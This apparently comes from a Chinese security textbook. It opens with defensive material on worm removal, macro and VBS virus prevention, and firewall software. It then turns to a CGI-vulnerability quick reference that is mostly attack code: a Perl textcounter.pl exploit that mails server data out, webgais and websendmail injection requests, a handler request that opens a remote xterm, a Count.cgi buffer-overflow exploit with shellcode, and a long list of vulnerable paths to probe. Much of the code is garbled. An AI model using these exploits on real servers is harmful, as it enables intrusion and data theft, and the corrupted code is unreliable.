● 通过Outlook电子邮件地址簿向用户发送带有蠕虫病毒附件文件的邮件。
● 通过IRC聊天工具传送病毒文件。
● 通过ICQ聊天程序将病毒复制给其他ICQ用户。
● 通过MIRC方式,在系统中安装后门程序,病毒制造者可远程控制。
该病毒会伪装成一个屏幕保护程序开始传播,如果通过Outlook电子邮件地址簿向用户发送带有蠕虫病毒附件文件时,它会以如下方式显示:
邮件主题:Hi
邮件内容:How are you ?
When I saw this screensaver, I immediately thought about you
I am in a harry, I promise you will love it!
附件名称:GONE.SCR
此病毒还会搜索计算机里的反病毒软件,它首先检查内存中是否有如下程序:
APLICA32.EXE、AVCONSOL.EXE 、AVP.EXE、AVP32.EXE、AVPCC.EXE、AVPM.EXE、CFIADMIN.EXE、CFIAUDIT.EXE、CFINET32.EXE、ESAFE.EXE、FRW.EXE、FEWEB.EXE、ICLOAD95.EXE、ICLOADNT.EXE、ICMON.EXE、ICSUPP95.EXE、ICSUPPNT.EXE、LOCKDOWN2000.EXE、PCFWallIcon.EXE、PW32.EXE、TDS2-98.EXE、TDS2-NT.EXE、VP32.EXE、VPCC.EXE、VPM.EXE、VSECOMR.EXE、VSHWIN32.EXE、VSSTAT.EXE、VW32.EXE、WEBSCANX.EXE、ZONEALARM.EXE
若存在上述程序,病毒将会自动关闭它们,同时查找硬盘上对应文件所在目录,并删除该目录下的所有文件。若无法删除,病毒会修改wininit.ini文件以便在系统重启时删除文件。
3. 手工清除方法
(1) 在纯DOS模式下,进入system目录,键入如下命令:
DEL GONE.SCR
删除gone.scr文件。
(2) 回到Windows,运行注册表编辑器,找到如下键值:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
删除其中名称中含有\gone.scr的键值。
(3) 删除mIRC目录中的REMOTE32.INI 文件。
(4) 删除MIRC.INI文件,用以前的备份文件中恢复该文件。
(5) 该病毒就被轻松清除。
3.3.7 Word宏病毒防治方法
Word处理文档的过程需要同时进行不同的操作,如打开文件、关闭文件、读取数据资料以及保存和打印等。事实上,每一种操作都对应着特定的宏命令。宏病毒正是利用了软件中的这些宏命令进行感染与传播。
宏病毒的根本防治,在于禁止所有宏的执行,但这是不现实的。在实际工作中,我们可根据宏病毒的不同特征,采用以下一些行之有效的方法来防治宏病毒。
1. 根据AUTO宏的自动执行的特点,在打开Word文档时,可通过先禁止所有自动宏的执行,这样能够保证用户在安全启动Word文档后,进行必要的宏病毒检查,从而达到防治宏病毒的目的。在Word 97中,单击【工具】→【选项】→【常规】命令,在打开的【常规】对话框中选中【宏病毒防护】选项,这样Word就有了防止自动宏执行的功能。或者在打开Word文档时,按住Shift键,也可达到禁止自动宏的目的。对于使用Word 97以前版本的用户,需要自行编制一个名为Autoexec的宏。这个宏执行时将关闭其他所有自动宏。将Autoexec宏保存到一个另外命名的模板中,如abc.dot。当使用外来的Word文档时,先备份Normal.dot模板,再把abc.dot改名为normal.dot,这时Word也有了防止自动宏执行的功能。Autoexec宏可以只包含如下3条语句:
Sub Main、DisableAutoMacro、End Sub
2. 当怀疑系统带有宏病毒时,首先应检查是否存在可疑的宏,也就是一些用户没有编制过、也不是Word默认提供而出现的宏。特别是出现一些有奇怪名字的宏,如AAAZA0、AAAZFS等,肯定是病毒无疑,将它删除即可。即使删除错了,也不会对Word文档内容产生任何影响,仅仅是少了相应的宏功能而已。具体做法是,单击【工具】→【宏】命令,然后在打开【宏】对话框中单击“删除”按钮。如果需要,可以重新编制。
3. 针对宏病毒感染Normal.dot模板的特点,用户在新安装了Word软件后,可打开一个新文档,将Word的工作环境按照自己的使用习惯进行设置,并将需要使用的宏一次编制好,做完后保存新文档。这时生成的Normal.dot模板绝对没有宏病毒,可将其备份起来。在遇到有宏病毒感染时,用备份的Normal.dot模板覆盖当前的Normal.dot模板,可以起到消除宏病毒的作用。同样地把Winword\Startup目录下的Powerup.dot、Prcadin.dot、Symbar.dot也做个备份。这样,至少能保证Word每次启动时处于无毒状态。
4. 当使用外来可能有宏病毒的Word文档时,如果没有保留原来文档排版格式的必要,可先使用Windows自带的写字板来打开,将其转换为写字板格式的文件保存后,再用Word调用。因为写字板不调用、不记录、不保存任何宏,文档经此转换后所有附带其上的宏(包括宏病毒)都将丢失。
5. 考虑到大部分Word用户使用的是普通的文字处理功能,很少使用宏编程,也对Normal.dot模板很少修改,因此用户可以单击【工具】→【选项】命令在【选项】对话框的【保存】选项卡中启用【提示保存Normal模板】复选框,如图3-13所示。
这样,一但宏病毒感染了Word文档后用户从Word退出时,Word会提示【更改的内容会影响到公用模板Normal,是否保存这些修改内容?】,这说明Word已感染宏病毒,当然应单击【否】按钮,退出后再采用其他方法杀毒。
图3-13 选择以提示Normal模板保存Word文件
3.3.8 VBS病毒的防治
现在有些在网络上很流行的病毒大部分是通过VBScript编写的,通常能够自动运行,例如I Love You、库尼什科娃病毒,它们都是由并不复杂的VBScript代码编写而成的。
说起VBScript还得从WSH说起,WSH是Windows Scripting Host(Windows脚本主机)的缩略形式。WSH这个概念最早出现于Windows 95操作系统,是一个基于32 位 Windows 平台,并独立于语言的脚本运行环境,比如:利用记事本文件编写了一个脚本文件,将其另存为.vbs或.js的文件,然后在Windows下双击即可运行,只要弄清楚其中的道理,就会有应付它们的办法,接下来就将介绍对VBS病毒的防治和修复方法。
Microsoft是用Windows Scripting Host(WSH)来运行VBScript脚本程序的。当然WSH能使脚本的功能很强大。关于怎么取消WSH,阻止VBS病毒对系统的破坏,请看下面的内容。
首先来查看WSH是否被启用,单击【开始】→【运行】命令,在【运行】对话框的【打开】下拉列表框中wscript,如果出现Windows Script Host对话框,如图3-14所示。
就说明WSH目前是可以用的。这里介绍3种办法办法让WSH失效。
第1种方法:Windows 9x用户将Windows目录下的wscript.exe改名,Windows 2000用户将系统下的Winnt\system32目录下的wscript.exe更名,如图3-15所示。
图3-14 Windows Script Host对话框
图3-15 系统下的Wscript.exe文件
第2种方法:Windows 9x操作系统可以单击【开始】→【设置】→【文件夹选项】命令,在打开的对话框的【文件类型】选项卡中,找到【VBS脚本文件】,编辑其打开方式即可;Windows 2000操作系统可以选择【开始】→【设置】→【控制面板】→【文件夹选项】命令,在打开的对话框的【文件类型】选项卡,找到VBScript Script文件(VBScript脚本文件),如图3-16所示。
图3-16 打开文件类型选项
然后单击【高级】按钮,修改2种打开方式(wscript.exe和cscript.exe打开方式),或者直接将其删除,如图3-17和3-18所示。
图3-17 编辑文件类型
图3-18 编辑VBScript Script的打开方式
第3种方法:使用第三方软件来禁用WSH,Noscript就是专门用来禁用或是激活WSH的工具
安全软件介绍
3.4 安全软件介绍
在本节中将介绍2款优秀的网络安全软件的使用。
3.4.1 LockDown
1. 简单介绍
网络给计算机的安全带来了新的冲击。所谓的特洛伊木马(Trojans)出现了,臭名昭著的BO病毒就是一例。如同它的名字一样,这种病毒就像古特洛伊人在敌人城外留下的藏满士兵的木马一样留在我们的计算机中,通过它对方可以掌握我们计算机中的所有资料,甚至操纵我们的计算机,其危险是不言而喻的。而LockDown可以安全保护计算机,并防止入侵者在未经许可的情况下访问该计算机,这样所有的BO病毒对你无法构成威胁。因为如果你不许可他人访问你的计算机,BO病毒也就就失去了作用,现在可检测和移除所有已知和未知的特洛伊木马。LockDown是一款最棒的网络安全工具,能够清除目前已知的木马,能查出未知木马,能杀邮件病毒,能防止网络炸弹攻击,能在线检测已知对本机的访问并控制它们,能跟踪入侵者并留下它的罪证等。Lockdown是被其发布公司称为windows下最安全的网络安全保护软件。它具有在线监测、发现和清除木马、预防ICQ炸弹、自动跟踪入侵者的IP和ISP域名记录并且随时切断连线者等功能。该软件的功能强大,完全可以应付入侵者的侵袭。甚至用户即使没有精深的电脑知识,也能依靠它找到入侵者。
运行平台:Windows 98、Windows ME、Windows NT、Windows 2000、Windows XP
大小:2.38MB
2. 功能介绍
● 扫描选项:可对计算机中存在的木马就行扫描,并可以实时监控木马的存在,如图3-21所示。
● 常规选项:具有显示计算机启动程序、服务列表、显示扩展名、常规设置、文件监视设置、注册表监视设置等功能,
● 端口选项:具有查看、禁止计算机上所开放的端口以及对计算机进行安全设置等,
● 共享选项:具有可以查看、更改本地计算机所有共享项目、密码及IP过渡等功能,
● 网络工具:具有追踪路由、Whois、Finger、Ping、NsLookup等功能
● 连接选项:可查看、监视本机连接,
● 进程选项:显示计算机全部运行的程序,并能结束进程
● 升级选项:可以实现在线升级功能,如:更新木马信息等,
该软件在1999年获得了PC Magazine的技术卓越大奖,专家对它的评语是:“对于没有防火墙的家庭用户来说,LOCKDown是一道不可缺少的防线;而对于企业网络,它又增加了一层保护措施—— 它并不是要取代防火墙,而是阻止企图穿过防火墙的入侵者”。LOCKDown集成有非常强大的检测和分析引擎,可以识别200多种入侵技巧,给用户全面的网络检测以及系统防护,它还能即时监测网络端口和协议,拦截所有可疑的网络入侵,无论入侵者如何费尽心机也无法危害到系统。而且它还可以将查明那些试图入侵的入侵者的NetBIOS(WINS)名、DNS名或是将其目前所使用的IP地址记录下来,以便用户采取进一步行动。该软件的灵敏度和准确率非常高,稳定性也相当出色,系统资源占用率极少,是广大网友的最佳选择。
3.4.2 天网防火墙个人版
1. 简单介绍
天网防火墙个人版是由天网安全实验室制作的给个人电脑使用的网络安全程序。它根据系统管理者设定的安全规则(Security Rules)把守网络,提供强大的访问控制、应用选通、信息过滤等功能。它可以抵挡网络入侵和攻击,防止信息泄露,并可与天网安全实验室的网站()相配合,根据可疑的攻击信息找到攻击者。天网防火墙把网络分为本地网和因特网,可以针对来自不同网络的信息设置不同的安全方案,它适合拨号上网的用户。现最新的版本是2.46 beta版本。目前天网防火墙已经得到了“中国***学盟禁止字符***部信息安全产品认证 ”。
运行平台:Windows 9x、Windows ME、Windows NT、Windows 2000、Windows XP
大小:1.42MB
天网防火墙个人版
2. 功能介绍
● 应用程序规则设置,
该功能可以控制应用程序发送和接收数据包的类型、通信端口,并且决定拦截还是通过,这是目前其他很多软件防火墙不具有的功能。
● IP规则设置,。
图3-30 应用程序规则& && && &
应用程序规则设置是针对每一个应用程序的,而IP规则设置是针对整个系统的,IP规则是针对整个系统的数据包监测,主要实现的功能是防御ICMP攻击、防御IGMP攻击、TCP数据包监视、UDP数据包监视等。
● 日志记录功能,
天网防火墙将会把所有不合规则的数据包拦截并且记录下来,如果选择了监视TCP和UDP数据包,那每一个发送和接受的每个数据包都将被记录下来。每条记录从左到右分别是发送/接受时间、发送IP地址、数据包类型、本机通信端口、对方通信端口和标志位。
CGI及系统漏洞速查
3.5 CGI及系统漏洞速查
● phf漏洞
漏洞介绍:phf漏洞是最经典了,可以通过浏览器执行服务器的命令来查找,如下 所示:
/etc/passwd
● php.cgi 2.0beta10或更早版本的漏洞
漏洞介绍:可以读nobody权限的所有文件。
php.cgi 2.1版本的只能读shtml文件,但对于密码文件可能在/etc/master.passwd、/etc/security/passwd路径下。
● whois_raw.cgi
● faxsurvey
● textcounter.pl
漏洞介绍:如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行 命令。
#!/usr/bin/perl
$URL='http://dtp.kappa.ro/a/test.shtml'; # please _DO_ _modify_ this
$EMAIL=',root'; # please _DO_ _modify_ this
if ($ARGV[0]) { $CMD=$ARGV[0];}else{
$CMD=&(cd ..;cd ..;cd ..;set)\|mail ${EMAIL} -sanothe
}$text=&${URL}/;IFS=\8;${CMD};echo|&;$text =~ s/ /\$\{IFS\}/g;#print &$text\
system({&wget&} &wget&, $text, &-O/dev/null&);
system({&wget&} &wget&, $text, &-O/dev/null&);
#system({&lynx&} &lynx&, $text); #如果没有wget命令也可以用lynx
#system({&lynx&} &lynx&, $text);
● 一些版本(1.1)的info2www的漏洞
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami asswd|)'
You have new mail.
● pfdispaly.cgi
lynx -source \
'/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'
pfdisplay.cgi还有另外一个漏洞可以执行命令
lynx -dump '%0A/bin/uname%20-a|'
lynx -dump \
'%0A/usr/bin/X11/xclock%20-display%20evi
● www-sql
可以让入侵者读一些受限制的页面如:
在浏览器里输入:,入侵者就会被要求输入账号和口令,而有www-sql就不必了:
● view-source
● webgais
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the &exploit&line)
query=';mail+drazvan\@pop3.kappa.roparagraph
● websendmail
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of thestring passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.orgubject=a&content=a
● handler
GET /cgi-bin/handler/useless_cat /etc/passwd|?data=DownloadHTTP/1.0
GET /cgi-bin/handler/xwsh -|?data=Download
GET /cgi-bin/handler/;xterm-displaydanish:0-e/bin/sh|?data=Download
cat后是Tab键而不是空格,服务器会报告不能打开useless_shit,但仍旧执行下面命令。
● test-cgi
lynx \whatever
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME =
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = xxxx.xxxx.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
得到一些http的目录:
lynx \help&0a/bin/cat%20/etc/passwd
有时可能也不管用,可尝试:
还可以这样尝试:
GET /cgi-bin/test-cgi?* HTTP/1.0
GET /cgi-bin/test-cgi?x *
GET /cgi-bin/nph-test-cgi?* HTTP/1.0
GET /cgi-bin/nph-test-cgi?x *
GET /cgi-bin/test-cgi?x HTTP/1.0 *
GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *
● 对于某些BSD的apache可以:
● htmlscript
● Frontpage extensions
如果读将得到FP extensions的版本和它在服务器上的路径,还有一些密码文件,如:
● Vulnerability in Glimpse HTTP
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor\@\MD;echo HTTP/1.0
● Count.cgi
该程序只对Count.cgi 24以下版本有效:
/*### count.c ########################################################*/
/* Forwards */
unsigned long getsp(int);
int usage(char *);
void doit(char *,long, char *);
/* Constants */
char shell[]=
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d\x5e\x18\x88\x46\x2c\x88\x46\x30&
&\x88\x46\x39\x88\x46\x4b\x8d\x56\x20\x89\x16\x8d\x56\x2d\x89\x56&
&\x04\x8d\x56\x31\x89\x56\x08\x8d\x56\x3a\x89\x56\x0c\x8d\x56\x10&
&\x89\x46\x10\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xbf&
&\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff&
&\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff&
&/usr/X11R6/bin/xterm0-ut0-display0&;
char endpad[]=
&\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff&
&\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff&;
int main (int argc, char *argv[]){
char *shellcode = NULL;
int cnt,ver,retcount, dispnum,dotquads[4],
char dispname[255];
offset = sp = cnt = ver = 0;
fprintf(stderr,&\t%s - Gus\n&,argv[0]);
if (argc&3) usage(argv[0]);
while ((cnt = getopt(argc,argv,&h:d:v:&)) != EOF) {
switch(cnt){
retcount = sscanf(optarg, &%d.%d.%d.%d:%d&,
&dotquads[0],
&dotquads[1],
&dotquads[2],
dotquads[3], &dispnum);
if (retcount != 5) usage(argv[0]);
sprintf(dispname, &%03d.%03d.%03d.%03d:%01d&,
dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum);
shellcode=malloc(strlen((char *)optarg)+strlen(shell)+strlen(endpad));
sprintf(shellcode,&%s%s%s&,shell,dispname,endpad);
ver = atoi(optarg);
offset = atoi(optarg);
usage(argv[0]);
sp = offset + getsp(ver);
(void)doit(host,sp,shellcode);
unsigned long getsp(int ver) {
/* Get the stack pointer we should be using. YMMV. If it does not work,
try using -o X, where x is between -1500 and 1500 */
unsigned long sp=0;
if (ver == 15) sp = 0xbfffea50;
if (ver == 20) sp = 0xbfffea50;
if (ver == 22) sp = 0xbfffeab4;
if (ver == 23) sp = 0xbfffee38; /* Dunno about this one */
if (sp == 0) {
fprintf(stderr,&I don't have an sp for that version try using the -o option.
fprintf(stderr,&Versions above 24 are patched for this bug.\n&);
int usage (char *name) {
fprintf(stderr,&\tUsage:%s -h host -d -v [-o ]\n
fprintf(stderr,&\te.g. %s -h
-d 127.0.0.1:0 -v 22\n&,name);
int openhost (char *host, int port) {
struct hostent *
struct sockaddr_
he = gethostbyname(host);
if (he == NULL) {
perror(&Bad hostname\n&);
memcpy(&sa.sin_addr, he-&h_addr, he-&h_length);
sa.sin_port=htons(port);
sa.sin_family=AF_INET;
sock=socket(AF_INET,SOCK_STREAM,0);
if (sock & 0) {
perror (&cannot open socket&);
bzero(&sa.sin_zero,sizeof (sa.sin_zero));
if (connect(sock,(struct sockaddr *)&sa,sizeof sa)&0) {
perror(&cannot connect to host&);
return(sock);
void doit (char *host,long sp, char *shellcode) {
char qs[7000];
int bufsize = 16;
char buf[bufsize];
char chain[] = &user=a&;
bzero(buf);
for(cnt=0;cnt&4104;cnt+=4) {
qs[cnt+0] = sp & 0x000000
qs[cnt+1] = (sp & 0x0000ff00) && 8;
qs[cnt+2] = (sp & 0x00ff0000) && 16;
qs[cnt+3] = (sp & 0xff000000) && 24;
strcpy(qs,chain);
qs[strlen(chain)]=0x90;
qs[4104]= sp&0x000000
qs[4105]=(sp&0x0000ff00)&&8;
qs[4106]=(sp&0x00ff0000)&&16;
qs[4107]=(sp&0xff000000)&&24;
qs[4108]= sp&0x000000
qs[4109]=(sp&0x0000ff00)&&8;
qs[4110]=(sp&0x00ff0000)&&16;
qs[4111]=(sp&0xff000000)&&24;
qs[4112]= sp&0x000000
qs[4113]=(sp&0x0000ff00)&&8;
qs[4114]=(sp&0x00ff0000)&&16;
qs[4115]=(sp&0xff000000)&&24;
qs[4116]= sp&0x000000
qs[4117]=(sp&0x0000ff00)&&8;
qs[4118]=(sp&0x00ff0000)&&16;
qs[4119]=(sp&0xff000000)&&24;
qs[4120]= sp&0x000000
qs[4121]=(sp&0x0000ff00)&&8;
qs[4122]=(sp&0x00ff0000)&&16;
qs[4123]=(sp&0xff000000)&&24;
qs[4124]= sp&0x000000
qs[4125]=(sp&0x0000ff00)&&8;
qs[4126]=(sp&0x00ff0000)&&16;
qs[4127]=(sp&0xff000000)&&24;
qs[4128]= sp&0x000000
qs[4129]=(sp&0x0000ff00)&&8;
qs[4130]=(sp&0x00ff0000)&&16;
qs[4131]=(sp&0xff000000)&&24;
strcpy((char*)&qs[4132],shellcode);
sock = openhost(host,80);
write(sock,&GET /cgi-bin/Count.cgi?&,23);
write(sock,qs,strlen(qs));
write(sock,& HTTP/1.0\n&,10);
write(sock,&User-Agent: &,12);
rite(sock,qs,strlen(qs));
write(sock,&\n\n&,2);
/* printf(&GET /cgi-bin/Count.cgi?%s HTTP/1.0\nUser-Agent: %s\n\n&,qs,qs); *
setenv(&HTTP_USER_AGENT&,qs,1);
setenv(&QUERY_STRING&,qs,1);
system(&./Count.cgi&);
● finger.cgi
得到主机上登录的用户名。
漏洞介绍:利用photoads这个CGI模块攻入主机,可以入侵PCWEEK-LINUX 主机,具体如下:
lynx &/photoads/cgi-bin/edit.cgi?AdNum=31337&action=done&Country=lala&City=lele&State=a&EMail=&Name=%0a
11111&hone=11&Subject=la&password=
0&CityStPhone=0&Renewed=0&
创建新AD值绕过 $AdNum 的检查后用:
lynx '/photoads/cgi-bin/photo.cgi?file=a.jpg&AdNum=
111&DataFile=
1&assword=0&FILE_CONTENT=%00%00%00%00%00%00%00%00%00%00%00%00%00&FILE_NAME=/lala/\../../../../../../../home/httpd/html/photoads/cgi-bin/advisory.cgi%00.gif'
创建/覆盖用户 nobody 有权写的任何文件。
● visadmin.exe
http://server/cgi-bin/visadmin.exe?user=guest
这个命令行将不停的向服务器的硬盘里写东西,直到写满为止。
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8ine Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
● webgais
query=';mail+
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the &exploit&line)
query=';mail+drazvan\@pop3.kappa.roparagraph
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.orgubject=a
&content=a
http://server/cgi-bin/wrap?/../../../../../etc
漏洞介绍:列出etc目录里的文件,下面是可能包含漏洞的所有CGI程序名:
/cgi-bin/rwwwshell.pl
/cgi-bin/phf
/cgi-bin/Count.cgi
/cgi-bin/test.cgi
/cgi-bin/nph-test-cgi
/cgi-bin/nph-publish
/cgi-bin/php.cgi
/cgi-bin/handler
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript /cgi-bin/pfdisplay.cgi
/cgi-bin/perl.exe
/cgi-bin/wwwboard.pl
/cgi-bin/www-sql
/cgi-bin/view-source
/cgi-bin/campas
/cgi-bin/aglimpse
/cgi-bin/glimpse
/cgi-bin/man.sh
/cgi-bin/AT-admin.cgi
/scripts/no-such-file.pl
/_vti_bin/shtml.dll
/_vti_inf.html
/_vti_pvt/administrators.pwd
/_vti_pvt/users.pwd
/msadc/Samples/SELECTOR/showcode.asp
/scripts/iisadmin/ism.dll?http/dir
/adsamples/config/site.csc
/main.asp%81
/AdvWorks/equipment/catalog_type.asp?
/cgi-bin/input.bat?|dir..\..\windows
/index.asp:DATA
/cgi-bin/visadmin.exe?user=guest
/?PageServices
/cgi-bin/get32.exe|echo%20&c:\file.txt
/cgi-bin/cachemgr.cgi
/cgi-bin/pfdispaly.cgi?/../../../../etc/motd
/domcfg.nsf /today.nsf
/names.nsf
/catalog.nsf
/domlog.nsf
/cgi-bin/AT-generate.cgi
/secure/.wwwacl
/secure/.htaccess
/samples/search/webhits.exe
/scripts/srchadm/admin.idq
/cgi-bin/dumpenv.pl
adminlogin?RCpage=/sysadmin/index.stm /c:/program
/getdrvrs.exe
/test/test.cgi
/scripts/submit.cgi
/users/scripts/submit.cgi
/ncl_items.html?SUBJECT=2097 /cgi-bin/filemail.pl /cgi-bin/maillist.pl /cgi-bin/jj /cgi-bin/info2www
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/bnbform.cgi
/cgi-bin/survey.cgi
/cgi-bin/AnyForm2
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/environ.cgi
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/guestbook.cgi
/cgi-bin/edit.pl
/cgi-bin/perlshop.cgi
/_vti_inf.html
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd
/cgi-win/uploader.exe
/../../config.sys
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/aexp4b.htr
/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\WINNT\repair\sam._
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/openfile.cfm
/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\WINNT\repair\sam._
/CFIDE/Administrator/startstop.html
/cgi-bin/wwwboard.pl
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/cgi-dos/args.bat
/cgi-win/uploader.exe
/cgi-bin/rguest.exe
/cgi-bin/wguest.exe
/scripts/issadmin/bdir.htr
/scripts/CGImail.exe
/scripts/tools/newdsn.exe
/scripts/fpcount.exe
cfdocs/expelval/openfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/sendmail.cfm
/iissamples/exair/howitworks/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/msads/Samples/SELECTOR/showcode.asp
/search97.vts
/carbo.dll
/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
/.html/............./config.sys
Windows 98常见安全漏洞
4.1 Windows 98常见安全漏洞
本节将介绍Windows98操作系统的一些常见漏洞。
1. 共享密码校验漏洞
微软Net BIOS协议的口令校验服务端在对客户端的口令进行校验时,是以客户端发送的长度数据为依据。如果客户端设置数据包中密码长度域为1,并发送一个字节的明文口令给服务端。服务端就会将客户端发来的口令与服务端保存的共享口令的第一个字节进行明文比较,如果匹配就认为通过了验证。
2. ICMP攻击
补丁程序:
关于ICMP的攻击程序有很多,如WINNUKE、SPING和TEARDROP。WINNUKE可对使用Windows 3.11/95/NT操作系统的上网者进行攻击。它可向某一IP地址发送OOB(OUT OF BAND)数据,并攻击139端口(NetBIOS)。如果攻击者进行端口监听的话,还可攻击其他端口。当被攻击的计算机收到OOB数据后,就无法对数据进行处理,并出现Internet连接中断或蓝屏死机等现象。
ICMP通常报告在处理数据报过程中的错误并在以下几种情况下发送:
● 当数据报不能到达目的地时。
● 当网关已经失去缓存功能。
● 当网关能够引导主机在更短路由上发送。一般上网用户可能用不到ICMP,因此可以关闭ICMP。
shotgun早提出关于ICMP木马的设计思路,这种木马对只分析端口的防火墙是杀手。
3. ARP 拒绝服务攻击
它会影响Window 98系统。当向运行Windows的主机发送大量无关的ARP数据包时,会导致系统耗尽所有的CPU和内存资源而停止响应。如果向广播地址发送ARP请求时,可能导致整个局域网停止响应。
该类攻击程序有arpkill.exe。
4. IPX Ping 包拒绝服务漏洞
违规通过端口0x456发送一些不规范的IPX/SPX Ping包,可能导致服务器出现拒绝服务。IPX/SPX协议在Windows 98默认安装的情况下是不安装的,但在Windows 95默认安装时如果系统检测到网卡后此协议将会自动安装。如果IPX/SPX协议被禁止,Windows 9x 将接受特殊的畸形IPX Ping 包,而且发送源地址已被修改为广播地址,而且会导致广播紊乱,促使带宽饱和,出现拒绝服务。如果源地址已被修改为广播地址,这样此网段中的每个机器都将响应此Ping请求,大量的响应将导致网络瘫痪。
5. NetBIOS 缓存漏洞
